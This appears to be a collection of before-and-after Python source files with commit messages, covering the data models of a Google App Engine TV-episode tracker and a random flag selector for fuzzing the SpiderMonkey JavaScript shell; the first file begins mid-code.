                       date=episode_info.date)

    @classmethod
    def get_all_dict(cls):
        """Return {str(show key): [recent episodes]} (max 20 per show), memcached."""
        episode_dict = memcache.get(cls._memkey_episode_dict)
        if episode_dict is not None:
            return episode_dict
        now = datetime.datetime.now()
        # Despite the name, the window is 8 days back.
        one_week_ago = now - datetime.timedelta(days=8)
        # in_one_week = now + datetime.timedelta(days=8)
        episodes = Episode.all().filter("date >",one_week_ago)
        # removed this: .filter("date <",in_one_week).fetch(1000)
        episode_dict = {}
        for ep in episodes:
            # ep._show is the raw reference key; avoids dereferencing the Show.
            if len(episode_dict.get(str(ep._show),[])) < 20:
                # store max of 20 episodes per show
                episode_dict.setdefault(str(ep._show), []).append(ep)
        memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
        return episode_dict

    @classmethod
    def clear_cache(cls):
        """Evict the cached per-show episode dict."""
        memcache.delete(cls._memkey_episode_dict)

    @classmethod
    def add_clear_cache_task(cls, queue_name):
        """Enqueue a task that clears the episode cache; returns the Task."""
        t = taskqueue.Task(url=reverse('seriesly-shows-clear_cache'), params={})
        t.add(queue_name=queue_name)
        return t

    @classmethod
    def get_for_shows(cls, shows, before=None, after=None, order=None):
        """Return the cached episodes for *shows*, sorted by date.

        before/after bound the date range; an *order* starting with "-"
        reverses the list. Release lists for already-aired episodes are
        attached lazily and written back to memcache.
        """
        episode_list = []
        episode_dict = Episode.get_all_dict()
        changed = False
        now = datetime.datetime.now()
        for show in shows:
            k = str(show.key())
            if k in episode_dict:
                episode_dict[k].sort(key=lambda x: x.date)
                prev = None
                for ep in episode_dict[k]:
                    if prev is not None:
                        # Thread a singly linked "next" chain per show.
                        prev.next = ep
                    ep.show = show
                    if not hasattr(ep, "releases"):
                        if ep.date < now:
                            ep.releases = list(ep.release_set)
                        else:
                            ep.releases = []
                        changed = True
                    prev = ep
                episode_list.extend(episode_dict[k])
        if changed:
            memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
        episode_list.sort(key=lambda x: x.date)
        if after is not None or before is not None:
            lower = None
            upper = len(episode_list)
            for ep, i in zip(episode_list, range(len(episode_list))):
                if after is not None and lower is None and ep.date > after:
                    lower = i
                if before is not None and ep.date > before:
                    upper = i
                    break
            # NOTE(review): if *after* is given but no episode is later than it,
            # lower stays None and the unfiltered list is returned — looks buggy.
            if lower > 0 or upper < len(episode_list):
                episode_list = episode_list[lower:upper]
        if order is not None and order.startswith("-"):
            episode_list.reverse()
        return episode_list

    @classmethod
    def get_for_shows_old(cls, shows, before=None, after=None, order=None):
        """Datastore-query variant of get_for_shows; queries shows in chunks of 28."""
        def extra(q):
            # Apply the optional date bounds and ordering to query q.
            if before is not None:
                q = q.filter("date <", before)
            if after is not None:
                q = q.filter("date >", after)
            if order is not None:
                q = q.order(order)
            return q
        if not len(shows):
            return []
        if len(shows) <= 28:
            logging.debug("starting query")
            query = Episode.all().filter("show IN", shows)
            return extra(query).fetch(1000)
        episodes = []
        for i in range(len(shows) / 28 + 1):
            q_shows = shows[i*28:(i+1)*28]
            if not len(q_shows): continue
            episodes.extend(extra(Episode.all().filter("show IN", q_shows)).fetch(1000))
        # NOTE(review): sorted()'s second positional argument is *cmp* in
        # Python 2, not *key*, so these calls raise TypeError; additionally
        # list.reverse() returns None, so the first branch returns None.
        if order is not None and order.startswith("-"):
            return sorted(episodes, lambda x: x.date).reverse()
        else:
            return sorted(episodes, lambda x: x.date)

    def update(self, episode_info):
        """Refresh mutable fields (title, date) from TVRage info."""
        self.title = episode_info.title
        self.date = episode_info.date

    def get_next(self):
        """Return the next episode (of any show) airing after this one."""
        return Episode.all().filter("date >", self.date).get()

    def create_event_details(self, cal):
        """Append a VEVENT for this episode to calendar *cal* and return it."""
        vevent = cal.add('vevent')
        vevent.add('uid').value = "seriesly-episode-%s" % self.key()
        vevent.add('dtstart').value = self.date
        vevent.add('dtend').value = self.date + datetime.timedelta(minutes=self.show.runtime)
        vevent.add('summary').value = "%s - %s (%dx%d)" % (self.show.name, self.title,
                                                           self.season_number, self.number)
        vevent.add('location').value = self.show.network
        return vevent
Filter by active shows.
import logging
import re
import datetime
from pytz import utc
from google.appengine.api.labs import taskqueue
from google.appengine.api import memcache
from google.appengine.ext import db
from django.core.urlresolvers import reverse
from helper.string_utils import normalize
from series.tvrage import TVRage
class Show(db.Model):
    """A TV show mirrored from TVRage, cached aggressively in memcache."""
    name = db.StringProperty()
    normalized_name = db.StringProperty()  # kept in sync with name by put()
    alt_names = db.StringProperty()        # "|"-separated alternative names
    slug = db.StringProperty()
    description = db.StringProperty(indexed=False)
    genres = db.StringProperty(indexed=False)
    network = db.StringProperty(indexed=False)
    active = db.BooleanProperty()          # only active shows are cached/listed
    country = db.StringProperty(indexed=False)
    runtime = db.IntegerProperty()         # minutes (see Episode.date_end)
    timezone = db.StringProperty(indexed=False)
    tvrage_id = db.IntegerProperty()

    # Memcache keys for the two show caches.
    _memkey_all_shows_ordered = "all_shows_ordered"
    _memkey_shows_dict = "all_shows_dict"
    # Matches a leading "The " so names can be re-ordered as "X, The".
    re_find_the = re.compile("^The (.*)$")

    @classmethod
    def kind(cls):
        # Datastore kind name, kept distinct from the class name.
        return "series_show"

    def __unicode__(self):
        return self.name

    @property
    def idnr(self):
        """Numeric datastore id of this entity."""
        return self.key().id()

    def alternative_names(self):
        """Return the list of alternative names ([] when none are set)."""
        if self.alt_names is None:
            return []
        return self.alt_names.split("|")

    @classmethod
    def get_all_ordered(cls):
        """Return all active shows sorted by display name, memcached.

        Each returned show gets a transient ``ordered_name`` attribute:
        names longer than 33 chars are truncated with "..." and a leading
        "The " is moved to the end ("X, The") for sorting.
        """
        shows = memcache.get(cls._memkey_all_shows_ordered)
        if shows is not None:
            return shows
        shows = Show.all().filter("active =", True)
        show_list = []
        for show in shows:
            if len(show.name) > 33:
                # NOTE: truncation happens before the "The"-shuffle, so the
                # ellipsis ends up before ", The" — presumably intentional.
                show.ordered_name = cls.re_find_the.sub("\\1, The", show.name[:33]+"...")
            else:
                show.ordered_name = cls.re_find_the.sub("\\1, The", show.name)
            show_list.append(show)
        shows = sorted(show_list, key=lambda x: x.ordered_name)
        memcache.set(key=cls._memkey_all_shows_ordered, value=shows)
        return shows

    @classmethod
    def find(cls, show_name):
        """Look up a show by exact, normalized, or alternative name.

        Returns None for an empty name or when nothing matches.
        """
        if not len(show_name):
            return None
        norm_name = normalize(show_name)
        shows = Show.get_all_ordered()
        for show in shows:
            if show_name == show.name or norm_name == show.normalized_name or \
                any([norm_name == alt_name for alt_name in show.alternative_names()]):
                return show

    @classmethod
    def get_all_dict(cls):
        """Return a dict mapping str(show key) -> Show, memcached."""
        show_dict = memcache.get(cls._memkey_shows_dict)
        if show_dict is not None:
            return show_dict
        shows = Show.get_all_ordered()
        show_dict = dict([(str(show.key()), show) for show in shows])
        memcache.set(key=cls._memkey_shows_dict, value=show_dict)
        return show_dict

    @classmethod
    def clear_cache(cls):
        """Evict both Show memcache entries."""
        memcache.delete(cls._memkey_all_shows_ordered)
        memcache.delete(cls._memkey_shows_dict)

    def add_update_task(self):
        """Enqueue a task on the "series" queue that updates this show."""
        t = taskqueue.Task(url=reverse('seriesly-shows-update_show'), params={"key": str(self.key())})
        t.add(queue_name="series")
        return t

    def update(self, show_info=None, get_everything=False):
        """Refresh this show and its seasons from TVRage data.

        show_info is fetched via self.tvrage_id when None; get_everything
        forces a full episode refresh in Season.update_or_create.
        """
        if show_info is None:
            tvrage = TVRage()
            show_info = tvrage.get_info(self.tvrage_id)
        if show_info.name.startswith("'"): # Kill >>'Til Death<< here
            show_info.name = show_info.name.replace("'","",1)
        attr_list = ["name","network","genres","active","country","runtime","timezone","tvrage_id"]
        # Only write to the datastore when something actually changed.
        if self.update_attrs(show_info,attr_list):
            self.put()
        for season_info in show_info.seasons:
            logging.debug("Update or create Season...")
            Season.update_or_create(self, season_info, get_everything=get_everything)

    def update_attrs(self, info_obj, attr_list):
        """Copy the named attributes from info_obj; True if any changed."""
        changed = False
        for attr in attr_list:
            val = getattr(info_obj, attr)
            if val != getattr(self, attr):
                setattr(self, attr, val)
                changed = True
        return changed

    def put(self):
        """Store the entity, refreshing normalized_name from name first."""
        self.normalized_name = normalize(self.name)
        return super(Show, self).put()

    @classmethod
    def update_or_create(cls, name, show_id=None):
        """Fetch TVRage info (by name, or by id when name is None) and
        create/update the Show. Returns False when TVRage returned nothing.
        """
        tvrage = TVRage()
        if name is not None:
            show_info = tvrage.get_info_by_name(name)
        else:
            show_info = tvrage.get_info(show_id)
        if show_info is None:
            return False
        logging.debug("Show exists..?")
        # tvrage_id is the stable identifier used for de-duplication.
        show = Show.all().filter("tvrage_id =",show_info.tvrage_id).get()
        if show is None:
            logging.debug("Creating Show...")
            show = Show(name=show_info.name,
                        network=show_info.network,
                        genres=show_info.genres,
                        active=show_info.active,
                        country=show_info.country,
                        runtime=show_info.runtime,
                        timezone=show_info.timezone,
                        tvrage_id=show_info.tvrage_id)
            show.put()
        show.update(show_info)
class Season(db.Model):
    """One season of a Show; start/end mirror its first/last episode dates."""
    show = db.ReferenceProperty(Show)
    number = db.IntegerProperty()
    start = db.DateTimeProperty()
    end = db.DateTimeProperty()

    @classmethod
    def kind(cls):
        """Datastore kind name for this model."""
        return "series_season"

    @classmethod
    def update_or_create(cls, show, season_info, get_everything=False):
        """Locate the season of *show* matching season_info (creating it
        if absent), refresh it, and store it."""
        query = Season.all().filter("show =", show).filter("number =", season_info.season_nr)
        season = query.get()
        logging.debug("Found season? %s" % season)
        if season is None:
            season = Season(show=show, number=season_info.season_nr)
            season.put()
        season.update(season_info, get_everything=get_everything)
        season.put()

    def update(self, season_info, get_everything=False):
        """Refresh this season's episodes and its start/end dates.

        An episode is pushed to the datastore only when get_everything is
        set, it has no air date, or it airs on/after 48 hours ago.
        """
        cutoff = utc.localize(datetime.datetime.now()) - datetime.timedelta(hours=48)
        season_start = None
        info = None
        for info in season_info.episodes:
            logging.debug("Update episode... %s" % info)
            if season_start is None:
                season_start = info.date
            if get_everything or info.date is None or info.date >= cutoff:
                episode = Episode.update_or_create(self, info)
        logging.debug("All episodes updated...")
        self.start = season_start
        # info still references the final episode of the loop.
        if info is not None:
            self.end = info.date
class Episode(db.Model):
    """A single episode; show/season references plus denormalized numbers."""
    show = db.ReferenceProperty(Show)
    season = db.ReferenceProperty(Season)
    season_number = db.IntegerProperty()
    number = db.IntegerProperty()
    title = db.StringProperty()
    text = db.TextProperty(default="")
    date = db.DateTimeProperty()

    # Memcache key for the per-show dict of recent episodes.
    _memkey_episode_dict = "all_episodes_dict"

    @classmethod
    def kind(cls):
        """Datastore kind name for this model."""
        return "series_episode"

    @property
    def date_end(self):
        """End of the air slot: start date plus the show's runtime (minutes)."""
        return self.date + datetime.timedelta(minutes=self.show.runtime)

    @classmethod
    def update_or_create(cls, season, episode_info):
        """Create or refresh the episode of *season* matching episode_info.nr."""
        episode = Episode.all().filter("show =", season.show).filter("season =", season)\
                    .filter("number =", episode_info.nr).get()
        logging.debug("Found episode... %s" % episode)
        if episode is None:
            episode = Episode.create(season, episode_info)
        else:
            episode.update(episode_info)
        episode.put()
        return episode

    @classmethod
    def create(cls, season, episode_info):
        """Build (without putting) a new Episode entity from TVRage info."""
        return Episode(show=season.show, season=season,
                       season_number=season.number,
                       number=episode_info.nr,
                       title=episode_info.title,
                       date=episode_info.date)

    @classmethod
    def get_all_dict(cls):
        """Return {str(show key): [recent episodes]} (max 20 per show), memcached."""
        episode_dict = memcache.get(cls._memkey_episode_dict)
        if episode_dict is not None:
            return episode_dict
        now = datetime.datetime.now()
        # Despite the name, the window is 8 days back.
        one_week_ago = now - datetime.timedelta(days=8)
        episodes = Episode.all().filter("date >", one_week_ago)
        episode_dict = {}
        for ep in episodes:
            # ep._show is the raw reference key; avoids dereferencing the Show.
            if len(episode_dict.get(str(ep._show), [])) < 20:
                # store max of 20 episodes per show
                episode_dict.setdefault(str(ep._show), []).append(ep)
        memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
        return episode_dict

    @classmethod
    def clear_cache(cls):
        """Evict the cached per-show episode dict."""
        memcache.delete(cls._memkey_episode_dict)

    @classmethod
    def add_clear_cache_task(cls, queue_name):
        """Enqueue a task that clears the episode cache; returns the Task."""
        t = taskqueue.Task(url=reverse('seriesly-shows-clear_cache'), params={})
        t.add(queue_name=queue_name)
        return t

    @classmethod
    def get_for_shows(cls, shows, before=None, after=None, order=None):
        """Return the cached episodes for *shows*, sorted by date.

        before/after bound the date range (strictly later than *after*,
        strictly not later than *before*); an *order* starting with "-"
        reverses the list. Release lists for aired episodes are attached
        lazily and written back to memcache.
        """
        episode_list = []
        episode_dict = Episode.get_all_dict()
        changed = False
        now = datetime.datetime.now()
        for show in shows:
            k = str(show.key())
            if k not in episode_dict:
                continue
            episode_dict[k].sort(key=lambda x: x.date)
            prev = None
            for ep in episode_dict[k]:
                if prev is not None:
                    # Thread a singly linked "next" chain per show.
                    prev.next = ep
                ep.show = show
                if not hasattr(ep, "releases"):
                    # Cache releases of already-aired episodes on the entity.
                    if ep.date < now:
                        ep.releases = list(ep.release_set)
                    else:
                        ep.releases = []
                    changed = True
                prev = ep
            episode_list.extend(episode_dict[k])
        if changed:
            memcache.set(key=cls._memkey_episode_dict, value=episode_dict)
        episode_list.sort(key=lambda x: x.date)
        if after is not None or before is not None:
            lower = None
            upper = len(episode_list)
            # was: zip(episode_list, range(len(...))) — enumerate is the idiom.
            for i, ep in enumerate(episode_list):
                if after is not None and lower is None and ep.date > after:
                    lower = i
                if before is not None and ep.date > before:
                    upper = i
                    break
            if lower is None:
                # Bug fix: an *after* bound that matched nothing previously
                # left lower as None and returned the unfiltered list; now
                # it yields an empty slice. Without *after*, slice from 0.
                lower = len(episode_list) if after is not None else 0
            if lower > 0 or upper < len(episode_list):
                episode_list = episode_list[lower:upper]
        if order is not None and order.startswith("-"):
            episode_list.reverse()
        return episode_list

    @classmethod
    def get_for_shows_old(cls, shows, before=None, after=None, order=None):
        """Datastore-query variant of get_for_shows (kept for reference).

        GAE "IN" queries are limited in subquery count, so shows are
        queried in chunks of 28.
        """
        def extra(q):
            # Apply the optional date bounds and ordering to query q.
            if before is not None:
                q = q.filter("date <", before)
            if after is not None:
                q = q.filter("date >", after)
            if order is not None:
                q = q.order(order)
            return q
        if not len(shows):
            return []
        if len(shows) <= 28:
            logging.debug("starting query")
            query = Episode.all().filter("show IN", shows)
            return extra(query).fetch(1000)
        episodes = []
        for i in range(len(shows) / 28 + 1):
            q_shows = shows[i*28:(i+1)*28]
            if not len(q_shows):
                continue
            episodes.extend(extra(Episode.all().filter("show IN", q_shows)).fetch(1000))
        # Bug fix: sorted() was called with the key lambda as the positional
        # *cmp* argument (a TypeError at call time in Python 2), and the
        # descending branch returned list.reverse()'s None. Use key=/reverse=.
        if order is not None and order.startswith("-"):
            return sorted(episodes, key=lambda x: x.date, reverse=True)
        return sorted(episodes, key=lambda x: x.date)

    def update(self, episode_info):
        """Refresh mutable fields (title, date) from TVRage info."""
        self.title = episode_info.title
        self.date = episode_info.date

    def get_next(self):
        """Return the next episode (of any show) airing after this one."""
        return Episode.all().filter("date >", self.date).get()

    def create_event_details(self, cal):
        """Append a VEVENT for this episode to calendar *cal* and return it."""
        vevent = cal.add('vevent')
        vevent.add('uid').value = "seriesly-episode-%s" % self.key()
        vevent.add('dtstart').value = self.date
        vevent.add('dtend').value = self.date + datetime.timedelta(minutes=self.show.runtime)
        vevent.add('summary').value = "%s - %s (%dx%d)" % (self.show.name, self.title,
                                                           self.season_number, self.number)
        vevent.add('location').value = self.show.network
        return vevent
import random
import os
import sys
from multiprocessing import cpu_count
from inspectShell import shellSupports
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
def memoize(f, cache={}):
    """Decorator that caches f's results keyed on (f, args, kwargs).

    The shared default *cache* dict is intentional: it persists for the
    process lifetime and is shared by every memoized function.
    """
    # From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
    def wrapper(*args, **kwargs):
        lookup = (f, tuple(args), frozenset(kwargs.items()))
        try:
            return cache[lookup]
        except KeyError:
            result = f(*args, **kwargs)
            cache[lookup] = result
            return result
    return wrapper
@memoize
def shellSupportsFlag(shellPath, flag):
    """Return True if the js shell at shellPath accepts *flag* (memoized)."""
    return shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
    """Return True with probability *p* (p <= 0: never, p >= 1: always)."""
    roll = random.random()
    return roll < p
def randomFlagSet(shellPath):
    '''
    Returns a random list of command-line flags appropriate for the given shell.
    Only works for spidermonkey js shell. Does not work for xpcshell.
    '''
    args = []
    # Draw the big mode decisions up front so later branches agree with them.
    ion = shellSupportsFlag(shellPath, "--ion") and chance(.7)
    infer = chance(.7)
    if shellSupportsFlag(shellPath, '--fuzzing-safe'):
        args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
    if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
        args.append("--no-fpu") # --no-fpu landed in bug 858022
    # --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
    if shellSupportsFlag(shellPath, '--baseline-eager'):
        if chance(.3):
            args.append('--no-baseline')
        # elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
        elif chance(.6):
            args.append("--baseline-eager")
    if cpu_count() > 1 and shellSupportsFlag(shellPath, '--ion-parallel-compile=on'):
        # Turns on parallel compilation for threadsafe builds.
        if chance(.7):
            args.append("--ion-parallel-compile=on")
            totalThreads = random.randint(2, (cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
    if not infer:
        args.append("--no-ti")
    if ion:
        # Each Ion sub-feature is toggled independently with its own probability.
        if chance(.6):
            args.append("--ion-eager")
        if chance(.2):
            args.append("--ion-gvn=" + random.choice(["off", "pessimistic", "optimistic"]))
        if chance(.2):
            args.append("--ion-licm=off")
        if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
            args.append("--ion-edgecase-analysis=off")
        if chance(.2):
            args.append("--ion-range-analysis=off")
        if chance(.2):
            args.append("--ion-inlining=off")
        if chance(.2):
            args.append("--ion-osr=off")
        if chance(.2):
            args.append("--ion-limit-script-size=off")
        # Landed in m-c changeset 8db8eef79b8c
        if shellSupportsFlag(shellPath, '--ion-regalloc=lsra'):
            if chance(.5):
                args.append('--ion-regalloc=lsra') # On by default
            # Backtracking and stupid landed in m-c changeset dc4887f61d2e
            elif shellSupportsFlag(shellPath, '--ion-regalloc=backtracking') and chance(.4):
                args.append('--ion-regalloc=backtracking')
            # Disabled until bug 867767, bug 868731 and bug 871848 are fixed.
            #elif shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
            #    args.append('--ion-regalloc=stupid')
        if shellSupportsFlag(shellPath, '--ion-compile-try-catch'):
            if chance(.5):
                args.append('--ion-compile-try-catch')
        if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
            if chance(.5):
                args.append('--ion-check-range-analysis')
    else:
        args.append("--no-ion")
    # This is here because of bug 830508
    # This will all be Falsed due to bug 875656, which breaks jsfunfuzz
    if False and shellSupportsFlag(shellPath, "--execute=enableSPSProfilingAssertions(true)") and chance(.5):
        if chance(.5):
            args.append("--execute=enableSPSProfilingAssertions(true)")
        else:
            args.append("--execute=enableSPSProfilingAssertions(false)")
    #if chance(.05):
    #    args.append("--execute=verifyprebarriers()")
    #if chance(.05):
    #    args.append("--execute=verifypostbarriers()")
    if chance(.05):
        args.append("-D") # aka --dump-bytecode
    return args
def basicFlagSets(shellPath):
    '''
    compareJIT uses these combinations of flags (as well as the original set of flags) when run
    through Lithium and autoBisect.

    The newest flag family the shell supports decides which list is used;
    the first entry of each list is the baseline compareJIT compares against.
    '''
    if shellSupportsFlag(shellPath, "--fuzzing-safe"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # http://hg.mozilla.org/mozilla-central/annotate/c6bca8768874/js/src/jit-test/jit_test.py#l140
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe'], # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--no-baseline'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--no-baseline', '--no-ion', '--no-ti'],
            ['--fuzzing-safe', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-eager'],
            ['--fuzzing-safe', '--baseline-eager'],
            ['--fuzzing-safe', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
            ['--fuzzing-safe', '--baseline-eager', '--no-ti'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--baseline-eager', '--no-ti', '--no-fpu'],
        ]
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--baseline-eager"):
        basicFlagList = [
            # From http://hg.mozilla.org/mozilla-central/annotate/4236b1163508/js/src/jit-test/jit_test.py#l140
            [], # Here, compareJIT uses no flags as the sole baseline when fuzzing
            ['--no-baseline'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--no-baseline', '--no-ion', '--no-ti'],
            ['--no-baseline', '--no-ion'],
            ['--no-baseline', '--ion-eager'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--ion-eager'],
            ['--baseline-eager'],
            ['--baseline-eager', '--no-ion'], # See bug 848906 comment 1
            ['--baseline-eager', '--no-ti'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--baseline-eager', '--no-ti', '--no-fpu'],
        ]
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--no-ion"):
        basicFlagList = [
            # From https://bugzilla.mozilla.org/attachment.cgi?id=616725
            [], # Here, compareJIT uses no flags as the sole baseline when fuzzing
            ['--no-jm'],
            ['--ion-gvn=off', '--ion-licm=off'],
            ['--no-ion', '--no-jm', '--no-ti'],
            ['--no-ion', '--no-ti'],
            ['--no-ion', '--no-ti', '-a', '-d'],
            ['--no-ion', '--no-jm'],
            ['--no-ion'],
            ['--no-ion', '-a'],
            ['--no-ion', '-a', '-d'],
            ['--no-ion', '-d'],
            # Plus a special bonus
            ['--ion-eager'],
        ]
        if shellSupportsFlag(shellPath, "--no-baseline"):
            basicFlagList.extend([
                ['--no-baseline'],
                ['--no-baseline', '--no-ti'],
            ])
        return basicFlagList
    else:
        sets = [
            # ,m,am,amd,n,mn,amn,amdn,mdn
            [],
            ['-m'],
            ['-m', '-a'],
            ['-m', '-a', '-d']
        ]
        if shellSupportsFlag(shellPath, '-n'):
            sets.extend([
                ['-n'],
                ['-m', '-n'],
                ['-m', '-n', '-a'],
                ['-m', '-n', '-a', '-d'],
                ['-m', '-n', '-d']
            ])
        if shellSupportsFlag(shellPath, "--ion"):
            # Fix: the loop variable previously shadowed the builtin `set`.
            sets += [["--ion"] + flag_set for flag_set in sets]
        return sets
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
    """Manual smoke test: print 100 random flag sets for the shell at argv[1]."""
    import sys
    for i in range(100):
        print ' '.join(randomFlagSet(sys.argv[1]))

if __name__ == "__main__":
    testRandomFlags()
Add suppression for bug 906885.
import random
import os
import sys
from multiprocessing import cpu_count
from inspectShell import shellSupports
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
def memoize(f, cache={}):
    """Decorator that caches f's results keyed on (f, args, kwargs).

    The shared default *cache* dict is intentional: it persists for the
    process lifetime and is shared by every memoized function.
    """
    # From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
    def wrapper(*args, **kwargs):
        lookup = (f, tuple(args), frozenset(kwargs.items()))
        try:
            return cache[lookup]
        except KeyError:
            result = f(*args, **kwargs)
            cache[lookup] = result
            return result
    return wrapper
@memoize
def shellSupportsFlag(shellPath, flag):
    """Return True if the js shell at shellPath accepts *flag* (memoized)."""
    return shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
    """Return True with probability *p* (p <= 0: never, p >= 1: always)."""
    return p > random.random()
def randomFlagSet(shellPath):
    '''
    Returns a random list of command-line flags appropriate for the given shell.
    Only works for spidermonkey js shell. Does not work for xpcshell.
    '''
    args = []
    # Draw the big mode decisions up front so later branches agree with them.
    ion = shellSupportsFlag(shellPath, "--ion") and chance(.7)
    infer = chance(.7)
    if shellSupportsFlag(shellPath, '--fuzzing-safe'):
        args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
    if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
        args.append("--no-fpu") # --no-fpu landed in bug 858022
    # --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
    if shellSupportsFlag(shellPath, '--baseline-eager'):
        if chance(.3):
            args.append('--no-baseline')
        # elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
        elif chance(.6):
            args.append("--baseline-eager")
    if cpu_count() > 1 and shellSupportsFlag(shellPath, '--ion-parallel-compile=on'):
        # Turns on parallel compilation for threadsafe builds.
        if chance(.7):
            args.append("--ion-parallel-compile=on")
            totalThreads = random.randint(2, (cpu_count() * 2))
            args.append('--thread-count=' + str(totalThreads))
    if not infer:
        args.append("--no-ti")
    if ion:
        # Each Ion sub-feature is toggled independently with its own probability.
        if chance(.6):
            args.append("--ion-eager")
        if chance(.2):
            args.append("--ion-gvn=" + random.choice(["off", "pessimistic", "optimistic"]))
        if chance(.2):
            args.append("--ion-licm=off")
        if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
            args.append("--ion-edgecase-analysis=off")
        if chance(.2):
            args.append("--ion-range-analysis=off")
        if chance(.2):
            args.append("--ion-inlining=off")
        if chance(.2):
            args.append("--ion-osr=off")
        if chance(.2):
            args.append("--ion-limit-script-size=off")
        # Landed in m-c changeset 8db8eef79b8c
        if shellSupportsFlag(shellPath, '--ion-regalloc=lsra'):
            if chance(.5):
                args.append('--ion-regalloc=lsra') # On by default
            # Backtracking and stupid landed in m-c changeset dc4887f61d2e
            elif shellSupportsFlag(shellPath, '--ion-regalloc=backtracking') and chance(.4):
                args.append('--ion-regalloc=backtracking')
            # Disabled until bug 867767, bug 868731 and bug 871848 are fixed.
            #elif shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
            #    args.append('--ion-regalloc=stupid')
        if shellSupportsFlag(shellPath, '--ion-compile-try-catch'):
            if chance(.5):
                args.append('--ion-compile-try-catch')
        # Commented out due to bug 906885.
        #if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
        #    if chance(.5):
        #        args.append('--ion-check-range-analysis')
    else:
        args.append("--no-ion")
    # This is here because of bug 830508
    # This will all be Falsed due to bug 875656, which breaks jsfunfuzz
    if False and shellSupportsFlag(shellPath, "--execute=enableSPSProfilingAssertions(true)") and chance(.5):
        if chance(.5):
            args.append("--execute=enableSPSProfilingAssertions(true)")
        else:
            args.append("--execute=enableSPSProfilingAssertions(false)")
    #if chance(.05):
    #    args.append("--execute=verifyprebarriers()")
    #if chance(.05):
    #    args.append("--execute=verifypostbarriers()")
    if chance(.05):
        args.append("-D") # aka --dump-bytecode
    return args
def basicFlagSets(shellPath):
    '''
    compareJIT uses these combinations of flags (as well as the original set of flags) when run
    through Lithium and autoBisect.

    The newest flag family the shell supports decides which list is used;
    the first entry of each list is the baseline compareJIT compares against.
    '''
    if shellSupportsFlag(shellPath, "--fuzzing-safe"):
        basicFlagList = [
            # Parts of this flag permutation come from:
            # http://hg.mozilla.org/mozilla-central/annotate/c6bca8768874/js/src/jit-test/jit_test.py#l140
            # as well as other interesting flag combinations that have found / may find new bugs.
            ['--fuzzing-safe'], # compareJIT uses this first flag set as the sole baseline when fuzzing
            ['--fuzzing-safe', '--no-baseline'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--no-baseline', '--no-ion', '--no-ti'],
            ['--fuzzing-safe', '--no-baseline', '--no-ion'],
            ['--fuzzing-safe', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--ion-eager'],
            ['--fuzzing-safe', '--baseline-eager'],
            ['--fuzzing-safe', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
            ['--fuzzing-safe', '--baseline-eager', '--no-ti'], # Not in jit_test.py though...
            ['--fuzzing-safe', '--baseline-eager', '--no-ti', '--no-fpu'],
        ]
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--baseline-eager"):
        basicFlagList = [
            # From http://hg.mozilla.org/mozilla-central/annotate/4236b1163508/js/src/jit-test/jit_test.py#l140
            [], # Here, compareJIT uses no flags as the sole baseline when fuzzing
            ['--no-baseline'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--no-baseline', '--no-ion', '--no-ti'],
            ['--no-baseline', '--no-ion'],
            ['--no-baseline', '--ion-eager'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--ion-eager'],
            ['--baseline-eager'],
            ['--baseline-eager', '--no-ion'], # See bug 848906 comment 1
            ['--baseline-eager', '--no-ti'], # Not in jit_test.py as of rev c6bca8768874 though...
            ['--baseline-eager', '--no-ti', '--no-fpu'],
        ]
        return basicFlagList
    elif shellSupportsFlag(shellPath, "--no-ion"):
        basicFlagList = [
            # From https://bugzilla.mozilla.org/attachment.cgi?id=616725
            [], # Here, compareJIT uses no flags as the sole baseline when fuzzing
            ['--no-jm'],
            ['--ion-gvn=off', '--ion-licm=off'],
            ['--no-ion', '--no-jm', '--no-ti'],
            ['--no-ion', '--no-ti'],
            ['--no-ion', '--no-ti', '-a', '-d'],
            ['--no-ion', '--no-jm'],
            ['--no-ion'],
            ['--no-ion', '-a'],
            ['--no-ion', '-a', '-d'],
            ['--no-ion', '-d'],
            # Plus a special bonus
